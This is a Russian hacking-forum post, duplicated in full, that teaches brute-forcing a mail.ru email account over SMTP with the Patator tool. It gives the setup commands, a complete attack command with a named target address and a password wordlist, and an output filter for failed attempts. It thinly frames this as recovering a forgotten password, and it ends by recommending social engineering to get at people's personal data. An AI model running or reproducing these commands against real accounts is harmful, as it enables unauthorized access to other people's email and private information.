- Регистрация
- 8 Янв 2019
- Сообщения
- 527
- Реакции
- 71
- Баллы
- 118
[SIZE=14pt]Приветствую, хакеры, в данной статье расскажу об одном способе брута с помощью программы [/SIZE][SIZE=14pt]Patator[/SIZE]
[SIZE=18pt]Первый этап[/SIZE]
[SIZE=14pt]Для начала нам нужно склонить саму программу.[/SIZE]
[SIZE=14pt]Код:[/SIZE]
[SIZE=14pt] git clone https://github.com/lanjelot/patator.git[/SIZE]
[SIZE=14pt] cd patator[/SIZE]
[SIZE=14pt]chmod[/SIZE][SIZE=14pt] +[/SIZE][SIZE=14pt]x[/SIZE][SIZE=14pt] ./[/SIZE][SIZE=14pt]patator[/SIZE][SIZE=14pt].[/SIZE][SIZE=14pt]py[/SIZE]
[SIZE=18pt]Второй этап[/SIZE]
[SIZE=14pt]Давайте теперь попробуем запустить программу [/SIZE]
[SIZE=14pt] ./patator.py[/SIZE]
[SIZE=14pt]В нашем "меню" мы можем как раз таки ознакомиться о всех возможных векторах атаки, которые предоставляет нам patator.[/SIZE]
[SIZE=18pt]Третий этап[/SIZE]
[SIZE=14pt]Теперь давайте займемся разбором нашей задачи , на нужно реализовать smtp_login.
Давайте попробуем ввести команду:
./patator.py smtp_login[/SIZE]
[SIZE=14pt]Ага. Теперь мы можем наблюдать еще одно меню, которое позволяет нам настроить непосредственно саму атаку так, как мы хотим.[/SIZE]
[SIZE=14pt]В принципе, я думаю, что переводить флаги - нет смысла, можно догадаться, что к чему.
Итак, теперь приступим к самому бруту.
Сразу готов сказать, что синтаксис не привычный.
Теперь добавляем дополнительные параметры к условию задачи:
email - anonqwer@bk.ru
Наконец-то!
Давайте скорее приступим к восстановлению доступа к почте[/SIZE]
[SIZE=14pt]Код:[/SIZE]
[SIZE=14pt] ./patator.py smtp_login host=smtp.mail.ru port=465 ssl=1 user=anonqwer@bk.ru password=FILE0 0=/home/gopher/test.txt[/SIZE]
[SIZE=14pt]И что мы видим?!
Заветное "Authentication succeeded" !
Ура, мы вспомнили пароль [/SIZE]
[SIZE=14pt]А теперь по порядку:[/SIZE]
[SIZE=14pt]host - smtp сервер, где зарегистрирована наша почта (в моем случае - это маил)[/SIZE]
[SIZE=14pt]port - порт, к которому надо коннектить (Капитан очевидность, здравствуйте)[/SIZE]
[SIZE=14pt]ssl - принимает на вход 0 или 1, в нашем случае мы обязаны использовать ssl[/SIZE]
[SIZE=14pt]user - наш таргет[/SIZE]
[SIZE=14pt]password - принимает словарь, но не путем до файла, а константой FILEn, где n - цифра, в которую мы запишем наш путь до словаря[/SIZE]
[SIZE=14pt]Четвертый этап
Приводим наш вывод в оптимальный вид, а не как в этих ваших матрицах x)
Patator позволяет нам игнорировать вывод определенных ошибок с помощью дополнительного флага.
В нашем случае - у нас на некорректные пароли всегда вылетает ошибка "Authentication failed. Please verify your account by going to https://e.mail.ru/login?email=anonqwer@bk.ru"
Предлагаю убрать вывод паролей с такой ошибкой[/SIZE]
[SIZE=14pt]Код:[/SIZE]
[SIZE=14pt] ./patator.py smtp_login host=smtp.mail.ru port=465 ssl=1 user=anonqwer@bk.ru password=FILE0 0=/home/gopher/test.txt -x ignore:fgrep='Authentication failed. Please verify your account by going to https://e.mail.ru/login?email=anonqwer@bk.ru'[/SIZE]
[SIZE=14pt]Ура! Теперь лишняя информация (хотя она не всегда лишняя) не мусолит нам глаза[/SIZE]
[SIZE=18pt]Заключение[/SIZE][SIZE=18pt][/SIZE]
[SIZE=14pt]Вот таким не хитрым способом мы смогли получить доступ к нашей забытой почте.
Не для кого не секрет, что брут почт уже устарел и чтобы пробрутить @gmail.com или @yandex.ru придется подумать несколько раз, чтобы запустить брут. Лучший вектор для получения доступа к личным данным человека - социальная инженерия.[/SIZE]
[SIZE=16pt]Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.[/SIZE]
[SIZE=18pt]Первый этап[/SIZE]
[SIZE=14pt]Для начала нам нужно склонить саму программу.[/SIZE]
[SIZE=14pt]Код:[/SIZE]
[SIZE=14pt] git clone https://github.com/lanjelot/patator.git[/SIZE]
[SIZE=14pt] cd patator[/SIZE]
[SIZE=14pt]chmod[/SIZE][SIZE=14pt] +[/SIZE][SIZE=14pt]x[/SIZE][SIZE=14pt] ./[/SIZE][SIZE=14pt]patator[/SIZE][SIZE=14pt].[/SIZE][SIZE=14pt]py[/SIZE]
[SIZE=18pt]Второй этап[/SIZE]
[SIZE=14pt]Давайте теперь попробуем запустить программу [/SIZE]
[SIZE=14pt] ./patator.py[/SIZE]
[SIZE=14pt]В нашем "меню" мы можем как раз таки ознакомиться о всех возможных векторах атаки, которые предоставляет нам patator.[/SIZE]
[SIZE=18pt]Третий этап[/SIZE]
[SIZE=14pt]Теперь давайте займемся разбором нашей задачи , на нужно реализовать smtp_login.
Давайте попробуем ввести команду:
./patator.py smtp_login[/SIZE]
[SIZE=14pt]Ага. Теперь мы можем наблюдать еще одно меню, которое позволяет нам настроить непосредственно саму атаку так, как мы хотим.[/SIZE]
[SIZE=14pt]В принципе, я думаю, что переводить флаги - нет смысла, можно догадаться, что к чему.
Итак, теперь приступим к самому бруту.
Сразу готов сказать, что синтаксис не привычный.
Теперь добавляем дополнительные параметры к условию задачи:
email - anonqwer@bk.ru
Наконец-то!
Давайте скорее приступим к восстановлению доступа к почте[/SIZE]
[SIZE=14pt]Код:[/SIZE]
[SIZE=14pt] ./patator.py smtp_login host=smtp.mail.ru port=465 ssl=1 user=anonqwer@bk.ru password=FILE0 0=/home/gopher/test.txt[/SIZE]
[SIZE=14pt]И что мы видим?!
Заветное "Authentication succeeded" !
Ура, мы вспомнили пароль [/SIZE]
[SIZE=14pt]А теперь по порядку:[/SIZE]
[SIZE=14pt]host - smtp сервер, где зарегистрирована наша почта (в моем случае - это маил)[/SIZE]
[SIZE=14pt]port - порт, к которому надо коннектить (Капитан очевидность, здравствуйте)[/SIZE]
[SIZE=14pt]ssl - принимает на вход 0 или 1, в нашем случае мы обязаны использовать ssl[/SIZE]
[SIZE=14pt]user - наш таргет[/SIZE]
[SIZE=14pt]password - принимает словарь, но не путем до файла, а константой FILEn, где n - цифра, в которую мы запишем наш путь до словаря[/SIZE]
[SIZE=14pt]Четвертый этап
Приводим наш вывод в оптимальный вид, а не как в этих ваших матрицах x)
Patator позволяет нам игнорировать вывод определенных ошибок с помощью дополнительного флага.
В нашем случае - у нас на некорректные пароли всегда вылетает ошибка "Authentication failed. Please verify your account by going to https://e.mail.ru/login?email=anonqwer@bk.ru"
Предлагаю убрать вывод паролей с такой ошибкой[/SIZE]
[SIZE=14pt]Код:[/SIZE]
[SIZE=14pt] ./patator.py smtp_login host=smtp.mail.ru port=465 ssl=1 user=anonqwer@bk.ru password=FILE0 0=/home/gopher/test.txt -x ignore:fgrep='Authentication failed. Please verify your account by going to https://e.mail.ru/login?email=anonqwer@bk.ru'[/SIZE]
[SIZE=14pt]Ура! Теперь лишняя информация (хотя она не всегда лишняя) не мусолит нам глаза[/SIZE]
[SIZE=18pt]Заключение[/SIZE][SIZE=18pt][/SIZE]
[SIZE=14pt]Вот таким не хитрым способом мы смогли получить доступ к нашей забытой почте.
Не для кого не секрет, что брут почт уже устарел и чтобы пробрутить @gmail.com или @yandex.ru придется подумать несколько раз, чтобы запустить брут. Лучший вектор для получения доступа к личным данным человека - социальная инженерия.[/SIZE]
[SIZE=16pt]Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.[/SIZE]